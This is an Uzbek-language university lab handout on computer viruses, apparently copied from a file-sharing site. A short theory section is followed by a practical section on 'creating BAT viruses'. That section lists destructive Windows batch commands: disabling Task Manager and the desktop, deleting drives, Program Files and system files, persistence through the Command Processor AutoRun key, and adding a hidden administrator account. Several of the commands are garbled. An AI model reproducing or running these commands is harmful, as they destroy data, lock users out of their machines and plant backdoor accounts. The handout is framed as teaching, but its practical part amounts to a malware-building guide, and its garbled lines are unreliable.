4-лаборатория иши мавзу: Вирусли файлларни тадқиқи ва улардан ҳимоялаш усуллари

Download 336.64 Kb.

bet	1/2
Sana	27.05.2020
Hajmi	336.64 Kb.
	#110735

1 2

Bog'liq
4L

4-ЛАБОРАТОРИЯ ИШИ

Мавзу: Вирусли файлларни тадқиқи ва улардан ҳимоялаш усуллари

Ишдан мақсад: Вирус файлларни ишлаш алгоритмларини ўрганиш ва улардан ҳимояланиш.

Назарий қисм

Компьютер вируси - бошқа дастурий муҳитга ўрнатилган дастурий код (модул, бажарилувчи файл, текст документ, маълумот ташувчиларнинг юкланиш секторлари), бу вирус билан зарарланган компьютерда рухсат этилмаган харакатларни амалга ошириш учун мўлжалланган.

Компьютер вирусларининг ҳусусиятларидан бири ўзининг нусхаларини яратиш ва уларни ҳисоблаш тармоқларига ёки файлларга, компьютернинг система бўлимларига ва бошқа бажарилувчи объектларга жойлаштириш. Нусхалар ўзининг кўпайиш хоссаларини сақлаб қолишади.

Компьютер вируси – компьютер тармоқлари ёки компьютер тизимларида ўзининг нусхаларини ишлаб чиқарувчи ва тарқатувчи, қонуний фойдаланувчининг розилигисиз баъзи бир харакатларни амалга оширувчи командалар тўплами, ёки компьютерда турли хил рухсат этилмаган харакатларни бажарувчи бошқа дастурлар ичига кириб олувчи махсус ёзилган хажми катта бўлмаган дастур.

Вирус хусусиятлари:

1) зарарлаш ва кўпайиш имконияти;

2) тарқалишнинг юқори тезлиги;

3) зарарланган тизимларни танлай олиш (хар бир вирус маълум тизим ва гуруҳларни зарарлайди);

4) зарарланган тизимларни зарарлаш имконияти;

5) вируслар билан курашишни мураккаблиги;

6) янги турини ва авлодини пайдо бўлиш тезлигини ортиб бориши. “зарарланганлик” белгилари:

1) компьютернинг ноодатий ва ғайри табиий ишлайди;

2) баъзи бир дастурлар ишламайди ёки нотўғри ишлайди;

3) компьютер кўп қотиб қолади;

4) ишлаш секинлашади;

5) экранга номаълум хабарлар чиқа бошлайди;

6) файл таркиби ўзгариб қолади;

7) сақланмаган файлларни пайдо бўлиши;

8) ОТ юкланмайди.

Файллар устида вирусларнинг харакатлари.

1) файлларга зарар етказиш унинг таркибини ўзгартириши. Дастур ва документларнинг матнлари, маьлумотлар базаси ёки электрон почта файллари.

2) файлни зарарлаш, унинг таркибига ёзилиб олиш. Бундай файл вирус манбаси хисобланади.

Вирусларнинг синфланиши

Вирусларни қуйидаги асосий белгилари бўйича синфлаш мумкин:

• яшаш муҳити;

• Операцион тизим (ОТ);

• ишлаш алгаритми ҳусусиятлари;

• бошқа имкониятлари.

1. Яшаш муҳити бўйича:

• файл;

• юкланувчи;

• макро;

• тармоқ.

Файл вируслари турли хил усуллар ёрдамида бажарилувчи файлларга кириб олади, ёки эгизак файлларни яратади (компанон-вируслар), ёки файл тизимини ташкил этиш ҳусусиятларидан фойдаланадилар (link-вируслар). Бугунги кунда операцион тизимнинг барча бажарилувчи стандарт объектларни зарарловчи вируслар маълум: команда файллари (BAT), юкланувчи драйверлар (SYS, IO.SYS ва MSDOS.SYS) ва бажарилувчи иккилик файллар (EXE, COM). Бошқа операцион тизим файлларини зарарловчи вируслар хам мавжуд–Windows 2003, Windows XP, Windows Vista, Windows 7, MacOS.

Компьютер вирусларидан ҳимояланиш усуллари

- ахборотни ҳимоялашнинг умумий воситалари;

- профилактика чоралари;

- махсус дастурлар;

- аппарат воситалар.

BAT-вирусларни яратиш

Рабочий столни олиб ташлаш

@echo off

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Компьютер ўчириш

@echo off

shutdown -s -t 1 -c "lol" >nul
Компьютерни қайта юклаш

@echo off

shutdown -r -t 1 -c "lol" >nul
Дастурни ишга туширишни тақиқлаш

@echo off

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
Дарайверларни ўчириш

@echo off

del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Windows мусиқаларини ўчириш

@echo off

del "%SystemRoot%\Media" /q >nul
Бошқарув панелига киришни тақиқлайди

@echo off

reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
Ctrl-Alt-Delete тугмаларини ишлашини тақиқлайди

reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
Сичқонча тугмаларини ўрнини алмаштириш

%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
Сичқонча курсорини ўчириш

del "%SystemRoot%Cursors*.*" >nul
Карзина номини ўзгартириш

reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНҚ /F
Бошқарув панелини олиб ташлаш

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Хавфли вируслар
Дискни барча бўлимларини ўчириб ташлаш

rd [Буква_Диск]: /s /q
Program files даги барча файлларни ўчириш

del c:Program Files/q
explorer.exe процессини олиб ташлаш

taskkill /f /im explorer.exe >nul
Милионта папка яратади

FOR /L %%i IN (1,1,1000000) DO md %%i

Компьютерда ўрнатилган барча файлларни ўчириб ташлайди

del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
DEL командасини ўчириб ташлайди

del %0

Autoexec ни зарарлайди

copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul
Админ хуқуқли янги фойдаланувчи яратади логин:hacker ва пароль hack (Можете изменить)

@echo off

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторқ hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

Системани ишдан чиқариш (!) – киритиш чиқариш қурилмаларини ўчиради.

rundll32 user,disableoemlayer
Сичқонча тугмаларини ўрнини алмаштириш, қайтариб бўлмайди

rundll32 user,SwapMouseButton
Система ядросини ўчириш

del %systemroot%\system32\HAL.dll
Вирус дастурларини Bat Exe Converter дастури ёрдамида яратишни ўрганиш

Бундай файлларнинг кенгайтмаси .bat .exe .

-.bat файл блокнотда яратилади, при сақлашда .txt кенгайтма ўрнига .bat.

Янги блокнот очамиз ва унга mspaint – деб ёзамиз, myfile.bat номини бериб сақлаймиз.